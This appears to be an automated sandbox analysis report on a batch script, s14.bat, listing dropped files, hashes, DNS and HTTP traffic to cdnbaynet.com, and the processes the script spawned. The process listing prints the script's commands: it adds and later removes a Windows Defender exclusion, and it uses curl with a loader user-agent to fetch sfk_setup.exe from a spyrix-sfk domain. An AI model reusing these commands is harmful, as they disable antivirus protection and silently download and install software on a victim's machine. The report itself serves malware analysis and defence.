                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yqh0u2g4.3fg.psm1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\s14\l

                          Download File
                          Process:C:\Windows\System32\curl.exe
                          File Type:ASCII text, with no line terminators
                          Category:modified
                          Size (bytes):63
                          Entropy (8bit):4.431246742289477
                          Encrypted:false
                          SSDEEP:3:N8fhmPMdUKLR3QVL4A:280dVtgVL4A
                          MD5:F8F417F775B9CC418AAA7AD2592324C1
                          SHA1:5F2E034B5A2B39B99BA0447FF8F3898D8D1E455D
                          SHA-256:4048A5F29484C100ED0F87BBE6D462939C050E7F011B9327AC66837F9F269AA6
                          SHA-512:79E2BF550C0A463E62AEDECE5AA5ABB11DE38AADF82B8BE118BCE49F2D0542DE23D656F7C311F3839845261A1754839F507C83C0AB4003F5508DE9E6A9CA01A3
                          Malicious:false
                          Preview:https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe

                          C:\Users\user\AppData\Local\Temp\s14\stld2.tmp

                          Download File
                          Process:C:\Windows\System32\cmd.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):11
                          Entropy (8bit):3.095795255000934
                          Encrypted:false
                          SSDEEP:3:nWDn:nWD
                          MD5:285130BE63E78277DF11A9108B363925
                          SHA1:92DD2F701821CACA090F8058BD054E840FFF88CC
                          SHA-256:CFAEB467D2A24A24D97D2E8267E68E6D7C6C805D928DA760D6706AA20608FF5F
                          SHA-512:30755D1EC6BEF8B943100F321489ABBE09306817099623DE7916EC2F1CB9CCD191EBD8939352DAC6207AEB95963A30690452037C808FC165DB12C54099377BAC
                          Malicious:false
                          Preview:sfkstart ..

                          C:\Users\user\AppData\Local\Temp\s14\stld3.tmp

                          Download File
                          Process:C:\Windows\System32\cmd.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:modified
                          Size (bytes):10
                          Entropy (8bit):3.321928094887362
                          Encrypted:false
                          SSDEEP:3:n8xn:n8xn
                          MD5:CDB1A48B259C774953CF6BBE7400307F
                          SHA1:EA21684C2E98E04545F277AE0536ABB632C4327C
                          SHA-256:AC4A42FD557E8EF69E1D3BED829ED3A4AD955C40F96BE52315D72C269ADE781A
                          SHA-512:AA6132B49DC4A18909D975F92FA5D3D21B5B78FAA21913B17042F8AE71CE180280C6767159F3442CB0DFA62C6E42DB39C0F62AA54C2D5DB883BF4AC509F077F7
                          Malicious:false
                          Preview:sfkdone ..

                          \Device\ConDrv

                          Download File
                          Process:C:\Windows\System32\curl.exe
                          File Type:ASCII text, with CR, LF line terminators
                          Category:dropped
                          Size (bytes):71
                          Entropy (8bit):4.430661028683396
                          Encrypted:false
                          SSDEEP:3:3JtLeq5nMAB/ZjMeLIINAJYqAsd4MKLvon:3JtLeEnRjMeZNBgGMKM
                          MD5:EA4CEDD0D4F05460AD58CF4A0CBC8225
                          SHA1:C1C03C8059BFC82DAB7ADBAFE37EC997A2C8362E
                          SHA-256:63DBB13B2480370B57B7B78371E78B82F3E03961499428B69ABA0B73E580CFB0
                          SHA-512:DCF4AC8915D0D1B29F7329A3F617EF291C1FB0DED3B5D270E9CABF0F8821C7A2647262B513A345C8C6A1B4CB91007F5C1A714009A99849954504A5016843A683
                          Malicious:false
                          Preview:curl: no URL specified!..curl: try 'curl --help' for more information..

                          \Device\Null

                          Download File
                          Process:C:\Windows\System32\reg.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):243
                          Entropy (8bit):5.025903567998292
                          Encrypted:false
                          SSDEEP:6:rbsd3u6eWFF60OckSi23oH+H1gFyeWFF60OckSi23fksgeWFF60OckSi23fhn:QNFFvO4ZYeVAyNFFvO4ZssgNFFvO4ZZn
                          MD5:5F73D6EB745036C1AFF17E55835C42B2
                          SHA1:603662F0180E4B5AACD9DCDFB01738C0D29F7A3F
                          SHA-256:11C4731706427EC108A02F9FD527EC7DEEA25F012233B5F6EEC8D10F615CB631
                          SHA-512:E9B3B307A6CBC6EE6219347ED24246AFE1197CEE2A1AC621C7E8035DD32B9CAB256F80155D66E7580AFEE7022264CEE105EE08A380BE5960C30E26D3E2277E43
                          Malicious:false
                          Preview:..HKEY_USERS\S-1-5-19\Environment.. Path REG_EXPAND_SZ %USERPROFILE%\AppData\Local\Microsoft\WindowsApps;.. TEMP REG_EXPAND_SZ %USERPROFILE%\AppData\Local\Temp.. TMP REG_EXPAND_SZ %USERPROFILE%\AppData\Local\Temp....

                          Static File Info

                          General

                          File type:ASCII text, with CRLF line terminators
                          Entropy (8bit):5.408660186830059
                          TrID:
                            File name:s14.bat
                            File size:13'530 bytes
                            MD5:db54c87742c96b03caeb3774ecb51438
                            SHA1:f6a559b83cbc3b82cb0a5c2acb64b6d4038cb593
                            SHA256:634c59030c60c10818f142277376c9ba06d14110f41e544f6f3bae822352d0b9
                            SHA512:b33e9c706401d314b9501285a8a7034ae4961cda5ff40738eb4165ae673a33faf400fa1e877f1990372a9db2913ae713f1268ad91090508a5558df6e3a29b837
                            SSDEEP:384:DoXJPUYc9qXr+0Ac2/ij77HrPkICI0kY1:ChUporHZcij77HrsIckY1
                            TLSH:98529E0B309A5E8D9E10C619EA8C24CB5E9BA4F30034ABDFF01B81CF109E7A45F56A65
                            File Content Preview:rem ag37j8zcu4txzhm6xg8d0ssqlbwix9xkrn36mj1x..rem sx89jxmimypuir5iokjx7wmk3dm8q0xgyy6wjnxqav9ath67..@echo off..rem ei1nivgqp3jrx5t0pplb5cdof48ssb0y8n88gfs5c1nq5sok9i44a25hovzi5xivjl647u0..rem 14v2htbys8eobihgpunp2u6truudvdmggcajd8nje626g38z0h3mjaxklicbvd9

                            File Icon

                            Icon Hash:9686878b929a9886

                            Network Behavior

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Oct 2, 2024 06:11:22.011135101 CEST49707443192.168.2.7167.114.14.170
                            Oct 2, 2024 06:11:22.011266947 CEST44349707167.114.14.170192.168.2.7
                            Oct 2, 2024 06:11:22.011362076 CEST49707443192.168.2.7167.114.14.170
                            Oct 2, 2024 06:11:22.044393063 CEST49707443192.168.2.7167.114.14.170
                            Oct 2, 2024 06:11:22.044449091 CEST44349707167.114.14.170192.168.2.7
                            Oct 2, 2024 06:11:22.531233072 CEST44349707167.114.14.170192.168.2.7
                            Oct 2, 2024 06:11:22.531337976 CEST49707443192.168.2.7167.114.14.170
                            Oct 2, 2024 06:11:22.534945011 CEST49707443192.168.2.7167.114.14.170
                            Oct 2, 2024 06:11:22.534979105 CEST44349707167.114.14.170192.168.2.7
                            Oct 2, 2024 06:11:22.535242081 CEST44349707167.114.14.170192.168.2.7
                            Oct 2, 2024 06:11:22.537683010 CEST49707443192.168.2.7167.114.14.170
                            Oct 2, 2024 06:11:22.583409071 CEST44349707167.114.14.170192.168.2.7
                            Oct 2, 2024 06:11:23.132206917 CEST44349707167.114.14.170192.168.2.7
                            Oct 2, 2024 06:11:23.132282972 CEST44349707167.114.14.170192.168.2.7
                            Oct 2, 2024 06:11:23.132364988 CEST49707443192.168.2.7167.114.14.170
                            Oct 2, 2024 06:11:23.203397036 CEST49707443192.168.2.7167.114.14.170
                            Oct 2, 2024 06:11:23.203476906 CEST44349707167.114.14.170192.168.2.7

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Oct 2, 2024 06:11:21.905926943 CEST5183753192.168.2.71.1.1.1
                            Oct 2, 2024 06:11:21.918402910 CEST53518371.1.1.1192.168.2.7

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Oct 2, 2024 06:11:21.905926943 CEST192.168.2.71.1.1.10xeae4Standard query (0)cdnbaynet.comA (IP address)IN (0x0001)false

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Oct 2, 2024 06:11:21.918402910 CEST1.1.1.1192.168.2.70xeae4No error (0)cdnbaynet.com167.114.14.170A (IP address)IN (0x0001)false

                            HTTP Request Dependency Graph

                            • cdnbaynet.com

                            HTTPS Proxied Packets

                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.749707167.114.14.1704437656C:\Windows\System32\curl.exe
                            TimestampBytes transferredDirectionData
                            2024-10-02 04:11:22 UTC110OUTGET /loader/link.php?prg_id=sfk HTTP/1.1
                            Host: cdnbaynet.com
                            User-Agent: sfk-dst-loader-2.0
                            Accept: */*
                            2024-10-02 04:11:23 UTC165INHTTP/1.1 200 OK
                            Server: nginx/1.17.3
                            Date: Wed, 02 Oct 2024 04:11:23 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            2024-10-02 04:11:23 UTC74INData Raw: 33 66 0d 0a 68 74 74 70 73 3a 2f 2f 73 77 74 62 2d 64 6f 77 6e 6c 6f 61 64 2e 73 70 79 72 69 78 2d 73 66 6b 2e 63 6f 6d 2f 64 6f 77 6e 6c 6f 61 64 2f 73 66 6b 2f 73 66 6b 5f 73 65 74 75 70 2e 65 78 65 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 3fhttps://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe0


                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            Behavior

                            Click to jump to process

                            System Behavior

                            General

                            Target ID:1
                            Start time:00:11:06
                            Start date:02/10/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\s14.bat" "
                            Imagebase:0x7ff6bb520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:2
                            Start time:00:11:06
                            Start date:02/10/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff75da10000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:4
                            Start time:00:11:06
                            Start date:02/10/2024
                            Path:C:\Windows\System32\reg.exe
                            Wow64 process (32bit):false
                            Commandline:reg query "HKU\S-1-5-19\Environment"
                            Imagebase:0x7ff663340000
                            File size:77'312 bytes
                            MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            General

                            Target ID:7
                            Start time:00:11:06
                            Start date:02/10/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\s14'"
                            Imagebase:0x7ff741d30000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:13
                            Start time:00:11:20
                            Start date:02/10/2024
                            Path:C:\Windows\System32\curl.exe
                            Wow64 process (32bit):false
                            Commandline:curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\s14\l" https://cdnbaynet.com/loader/link.php?prg_id=sfk
                            Imagebase:0x7ff6c9e80000
                            File size:530'944 bytes
                            MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            General

                            Target ID:14
                            Start time:00:11:22
                            Start date:02/10/2024
                            Path:C:\Windows\System32\curl.exe
                            Wow64 process (32bit):false
                            Commandline:curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\s14\" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
                            Imagebase:0x7ff6c9e80000
                            File size:530'944 bytes
                            MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            General

                            Target ID:15
                            Start time:00:11:22
                            Start date:02/10/2024
                            Path:C:\Windows\System32\timeout.exe
                            Wow64 process (32bit):false
                            Commandline:timeout 10
                            Imagebase:0x7ff6cf7b0000
                            File size:32'768 bytes
                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            General

                            Target ID:17
                            Start time:01:17:45
                            Start date:02/10/2024
                            Path:C:\Windows\System32\curl.exe
                            Wow64 process (32bit):false
                            Commandline:curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\s14\" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
                            Imagebase:0x7ff6c9e80000
                            File size:530'944 bytes
                            MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            General

                            Target ID:18
                            Start time:01:17:45
                            Start date:02/10/2024
                            Path:C:\Windows\System32\timeout.exe
                            Wow64 process (32bit):false
                            Commandline:timeout 10
                            Imagebase:0x7ff6cf7b0000
                            File size:32'768 bytes
                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            General

                            Target ID:19
                            Start time:01:17:55
                            Start date:02/10/2024
                            Path:C:\Windows\System32\curl.exe
                            Wow64 process (32bit):false
                            Commandline:curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\s14\" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
                            Imagebase:0x7ff6c9e80000
                            File size:530'944 bytes
                            MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            General

                            Target ID:20
                            Start time:01:17:55
                            Start date:02/10/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:powershell.exe Remove-MpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\s14'"
                            Imagebase:0x7ff741d30000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Disassembly

                            No disassembly